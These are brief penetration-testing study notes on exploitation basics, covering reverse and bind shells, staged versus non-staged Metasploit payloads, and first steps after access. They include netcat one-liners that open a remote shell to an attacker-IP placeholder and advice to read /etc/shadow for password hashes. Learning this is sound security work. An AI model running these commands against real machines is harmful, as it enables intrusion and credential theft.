Exploitation Basics
1. Shell
Reverse Shell : The target connects to the attacker.
Bind Shell : The attacker connects to the target.
1.1. Reverse Shell
Example
nc -nvlp 4444
nc <attacker IP> 4444 -e /bin/sh
1.2. Bind Shell
Example
nc <target IP> 4444
nc -nvlp 4444 -e /bin/sh
2. Payloads
| Non-staged | Staged |
|---|---|
| Sends exploit shellcode all at once | Sends payload in stages |
| Larger in size and won't always work | Can be less stable |
Example: windows/meterpreter_reverse_tcp |
Example: windows/meterpreter/reverse_tcp |
3. Basic commands once we have access to the machine
- Try to find the IP(s) of the machine
- Check the arp table / route
- Check the sudo privileges
- Check the
/etc/passwdfile in order to see the different users of the machine (from 500) - Check the
/etc/shadowfile in order to see the password hashes.